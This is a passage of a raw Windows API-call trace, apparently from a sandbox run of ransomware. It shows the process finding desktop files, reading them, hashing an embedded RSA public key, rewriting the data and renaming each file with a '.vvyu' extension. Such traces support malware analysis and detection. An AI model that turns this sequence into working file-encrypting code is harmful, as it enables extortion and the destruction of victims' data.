dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade7d0 | out: hHeap=0x2c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.220] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x2eaa, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x2eaa, lpOverlapped=0x0) returned 1 [0199.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.220] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2eaf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.220] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.222] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.222] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.222] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.222] CloseHandle (hObject=0x584) returned 1 [0199.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0199.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0199.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0199.224] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\EotVe.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\eotve.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\EotVe.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\eotve.bmp.vvyu")) returned 1 [0199.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.228] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.230] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3400, ftCreationTime.dwHighDateTime=0x1d8a663, ftLastAccessTime.dwLowDateTime=0xcdd1a870, ftLastAccessTime.dwHighDateTime=0x1d8a73e, ftLastWriteTime.dwLowDateTime=0xcdd1a870, ftLastWriteTime.dwHighDateTime=0x1d8a73e, nFileSizeHigh=0x0, nFileSizeLow=0x4d2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oUopEVgNwd1-z0KJB.bmp", cAlternateFileName="OUOPEV~1.BMP")) returned 1 [0199.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0199.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.231] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\oUopEVgNwd1-z0KJB.bmp") returned=".bmp" [0199.231] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\oUopEVgNwd1-z0KJB.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\ouopevgnwd1-z0kjb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.233] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=19756) returned 1 [0199.233] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.236] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4d06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.236] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.239] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.239] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x4d2c, lpOverlapped=0x0) returned 1 [0199.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.240] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.240] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b6c8) returned 1 [0199.241] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.241] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.241] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.241] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.241] GetLastError () returned 0x0 [0199.241] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.241] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0199.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.241] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.241] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.241] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4d30) returned 0x2af7168 [0199.242] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade7d0 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade818 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.242] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0199.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a58 [0199.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6a40 [0199.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0199.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.245] GetCurrentThreadId () returned 0x5d8 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5a80 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.246] GetCurrentThreadId () returned 0x5d8 [0199.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a58 [0199.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ab8 [0199.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0199.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.248] RtlAllocateHeap 